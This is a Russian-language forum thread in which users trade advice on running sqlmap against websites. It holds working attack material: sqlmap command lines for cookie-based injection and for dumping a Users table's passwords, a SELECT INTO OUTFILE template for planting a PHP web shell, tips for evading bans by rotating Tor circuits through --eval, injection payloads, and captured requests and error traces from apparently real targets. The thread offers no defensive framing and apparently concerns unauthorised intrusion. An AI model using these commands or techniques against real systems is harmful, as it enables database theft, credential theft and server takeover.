Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Setrus

    Setrus New Member

    Joined:
    12 Feb 2016
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Не "скармливайте" sqlmap-у раскрученную иньекцию, он не поймет так как сам будет пробывать "крутить", запрос должен быть что-то типо "http://www.site.ru/showbanner.php?banner_id=123" обязательно вставьте существующий banner_id дабы sqlmap смог найти boolean based иньекцию
     
  2. octer

    octer New Member

    Joined:
    4 Feb 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    SELECT 0xКод_скрипта_php_в_hex_который_хотим_залить INTO OUTFILE "Полный/путь/к/файлу.php";
    Но сколько я не пробовал, никогда не получалось.
     
  3. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    как минимум можно попытаться использовать tamper скрипты и опцию --delay, для того чтобы попытаться избежать бана
    если нужно ip менять то как вариант открыть контрол порт тора на который можно будет посылать запрос на смену цепочки нод а в sqlmap делать нечто вроде --eval="import os;os.system('тут команда которая говорит тору сменить цепочку')"
    либо написать скрипт который каждые N минут/секунд меняет глобальные системные прокси
     
    vikler likes this.
  4. Setrus

    Setrus New Member

    Joined:
    12 Feb 2016
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    --os-shell это залить шелл а sql-shell это просто функция для удобства вы пишете запрос select user from dual а sqlmap сам его подгоняет под тип sql иньекции дабы не пришлось самому руками скажем выводить посимвольно если boolean или time based.
     
  5. octer

    octer New Member

    Joined:
    4 Feb 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Но ведь с помощью неё можно залить php шелл, способом который я указал?
     
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Да можно, не не тем методом который вы указали
     
  7. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    GET /ad.php HTTP/1.1
    Cookie: banner_xxx9=1; auth=hjefu7sci3os9heqgejp6f7gr2; lang=ru; rabotamd_ad=* SQL injection; banner=1; popup=1; pre_lang=ru; PHPSESSID=avqgopd70kth9gnhbutrj3qhu3; user_id=hjefu7sci3os9heqgejp6f7gr2; _ga=GA1.2.475953970.1455644353; _gat=1; FTID=1Mms8o1x-pLR1Mms8o; FTID=1Mms8o1x-pLR1Mms8o
    X-Requested-With: XMLHttpRequest
    Referer: ---------------
    Host: ----------------
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*

    что делать так нехочет
    -r "C:\Users\doina\Desktop\88.txt" --eta --risk=3 --level=5 -dbs

    rabotamd_ad=
     
  8. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    уважаемые всем привет, вопрос в следующем я заметил что сайты сделанные на asp или aspx менее подвержены раскрутке чем те же написанные на php, может есть какие - то приемы что сможет облегчить раскрутку узвимостей для данных платформ?
     
  9. octer

    octer New Member

    Joined:
    4 Feb 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Тогда пожалуйста скажите как правильно залить php шелл на сервер с помощью функции --sql-shell, а то у меня ни разу не получилось.
     
  10. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    и сразу в догонку вопрос, есть уязвимость, есть ошибка в бд

    вот такого плана:
    Incorrect syntax near ', '.
    Unclosed quotation mark after the character string ' ORDER BY createTime DESC'.

    Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

    Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near ', '.
    Unclosed quotation mark after the character string ' ORDER BY createTime DESC'.

    Source Error:

    An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.

    Stack Trace:


    [SqlException (0x80131904): Incorrect syntax near ', '.
    Unclosed quotation mark after the character string ' ORDER BY createTime DESC'.]
    System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +388
    System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) +717
    System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) +4515
    System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() +61
    System.Data.SqlClient.SqlDataReader.get_MetaData() +134
    System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) +6557689
    System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async, Int32 timeout, Task& task, Boolean asyncWrite, SqlDataReader ds) +6560327
    System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, TaskCompletionSource`1 completion, Int32 timeout, Task& task, Boolean asyncWrite) +586
    System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method) +104
    System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior, String method) +288
    System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +237
    Baina.Library.Core.SqlDataContext.ExecuteReader(CommandType cmdType, String cmdText, IList`1 commandParameters) +251
    Baina.Library.Core.EntityRepository`1.Query(ICriteria criteria) +395
    Baina.Flikie.Wallpaper.WallpaperService.QueryInternal(String keyword, String resolution, Int32 contentLevel, String order, Int32 startIndex, Int32 resultSize) +134
    Baina.Flikie.Wallpaper.WallpaperService.QueryFromCacheOrInternal(String keyword, String resolution, Int32 contentLevel, String order, Int32 sIndex, Int32 resultSize) +348
    Baina.Flikie.Wallpaper.WallpaperService.Query(String keyword, String resolution, Int32 contentLevel, String order, Int32 startIndex, Int32 resultSize) +338
    Baina.Flikie.Wallpaper.UserWallpaperService.QueryWallpaper(Int32 userId, String keyword, String resolution, Int32 contentLevel, String order, Int32 startIndex, Int32 resultSize) +87
    Baina.Flikie.Web.MobileSite.Controllers.WallpaperController.GetWallpaperSearchResult(Int32 userId, String keywords) in D:\dolphin\Flikie\MobileSite\Controllers\WallpaperController.cs:96
    Baina.Flikie.Web.MobileSite.Controllers.WallpaperController.Index(Int32 id, String wallpaperName) in D:\dolphin\Flikie\MobileSite\Controllers\WallpaperController.cs:132
    lambda_method(Closure , ControllerBase , Object[] ) +167
    System.Web.Mvc.ReflectedActionDescriptor.Execute(ControllerContext controllerContext, IDictionary`2 parameters) +247
    System.Web.Mvc.ControllerActionInvoker.InvokeActionMethod(ControllerContext controllerContext, ActionDescriptor actionDescriptor, IDictionary`2 parameters) +39
    System.Web.Mvc.<>c__DisplayClassd.<InvokeActionMethodWithFilters>b__a() +120
    System.Web.Mvc.ControllerActionInvoker.InvokeActionMethodFilter(IActionFilter filter, ActionExecutingContext preContext, Func`1 continuation) +637
    System.Web.Mvc.ControllerActionInvoker.InvokeActionMethodWithFilters(ControllerContext controllerContext, IList`1 filters, ActionDescriptor actionDescriptor, IDictionary`2 parameters) +307
    System.Web.Mvc.ControllerActionInvoker.InvokeAction(ControllerContext controllerContext, String actionName) +720
    System.Web.Mvc.Controller.ExecuteCore() +162
    System.Web.Mvc.<>c__DisplayClass8.<BeginProcessRequest>b__4() +58
    System.Web.Mvc.Async.<>c__DisplayClass1.<MakeVoidDelegate>b__0() +15
    System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +606
    System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +288

    но не критится, может я что не так делаю?
     
  11. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    -u "site.com/ad.php" --cookie="rabotamd_ad= *" --level=5 --random-agent
     
    Octavian likes this.
  12. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    У меня сразу два вопроса)
    1)Хавиж показывает что в базе 40к строк,ставлю мапом на дамп - дампит только 400 строк и все!Как с этим бороться?
    2)Почему иногда мап при дампе выдает пустоту не Null а просто пустая строчка- как с этим бороться?
     
  13. demontager

    demontager New Member

    Joined:
    23 Jul 2009
    Messages:
    62
    Likes Received:
    2
    Reputations:
    0
    Не получается слить пароли в нормальной кодировке, получаются вот такие:
    Code:
    +------------------------------------------+
    | Password                                 |
    +------------------------------------------+
    | \x00\x07\x8ccï\x8e\x1c°\x12\x1a\x89ÂÁr£¾ |
    | \x00\t@  ÜáZ+Sxô\x0c\x82Ùp               |
    | \x00\x12\x87T\x9az¸ã<C\x9c\x9c2ô¢§       |
    | \x00#÷\x15X¹"P~?\x86¼[L\x16Â             |
    | \x00'2@T_¶·\x82H\x9dÞ½<.\x95             |
    | \x003y-!³Ä¡ÉG\x9fß\x19\x86P\x85          |
    | \x003y-!³Ä¡ÉG\x9fß\x19\x86P\x85          |
    | \x003y-!³Ä¡ÉG\x9fß\x19\x86P\x85          |
    | \x008õ¡XÃÌ\x03ÏBA\x9bį\x89\x1f          |
    | \x00Cá*¸\x16%\x02Z9_r\x90¡s)             |
    | \x00Mç Ç=<_᡼o=Üqì                      |
    | \x00Q!«Äè~\x02&nrc9§4\x10                |
    | \x00WdÜ¢ÔÉÍ~Þ\x1b÷\x83¨Éì                |
    | \x00]®¾\x05ü/^;\x87`çÇ8~à                |
    | \x00xB½ÿ\x1c\x1dª\x0c\r\x95ÜóÙ"B         |
    | \x00~¯©À\x8c±\x80OãÃr² ~                |
    | \x00\x88\x85â1e\x8f¹\x7f೿\x15£çÝ       |
    | \x00\x8aÁÏ«¬L\x0cÀZÊüïe:\x9d             |
    | \x00\x8d\x8f\x82¥\x19òDw\x15\x90°qµ=ÿ    |
    | \x00°9\x869j\x90N[Ñ·\x12\x06V\x86ª       |
    | \x00²v\x9dcöÄͶ¯a<Ì\x18çq                |
    | \x00ØX\x83$¥#\x13¦s\x04\x13ãß\x1d«       |
    | \x00Ø\x86fÂoø)ÕêƸÍù#\x04                |
    | \x00àÛã\x16°÷\x158\x92°\x9f\x0f\x1b®    |
    +------------------------------------------+
    
    Параметры такие
    Code:
    -D database -T Users -C Password --dump
     
  14. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Дб mssql ? попробую с ключами --hex --no-cast
     
  15. demontager

    demontager New Member

    Joined:
    23 Jul 2009
    Messages:
    62
    Likes Received:
    2
    Reputations:
    0
    Так не хочет
    Code:
    [15:40:30] [CRITICAL] switch '--no-cast' is incompatible with switch '--hex'
    Параметры сервера рапортует такие
    Code:
    web server operating system: Windows 8.1 or 2012 R2
    web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
    back-end DBMS: MySQL 5.0
    
     
  16. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Ребят подскажите пожалуйста

    В чем отличие ,если дампить с ключами -D olololo -T ololol -C username,password and etc --dump , сливает как обычно ,с небольшой скоростью

    А если пробывать через --sql-shell с командами select * from ololol.ololol сливает все таблицу за пару секунд ,получалось такое на пару сайтов .Вот и хотелось бы узнать в чем отличие
     
  17. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    странный вопрос, во втором случае по факту прямой доступ к бд и одним запросом ты берешь все хотя и могут быть ограничения, а в первом тянется все кучей запросов последовательно
     
  18. XoringAngry

    XoringAngry New Member

    Joined:
    28 Feb 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0

    лол на окнах извините, я использую переводчика
     
  19. XoringAngry

    XoringAngry New Member

    Joined:
    28 Feb 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    нет, но вы можете легко написать инъекции XPATH, если вы знаете язык сценариев и базы данных, если это SOAP вебсервис вы можете использовать библиотеку как handsoap и написать несколько полезных нагрузок вне для конкретной базы данных и запустить скрипт для приложений веб-вам безопасность на самом деле что-нибудь большой без какой-либо возможности программирования не может сделать.
     
  20. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    Как раскрутить такую скулю?
    site.ru/v2-live-with-a-5-1-win/

    Acunetix:
    Path Fragment (suffix /) input - was set to success' AND 3*2*1=6 AND '000CDY9'='000CDY9
    site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000SgxW/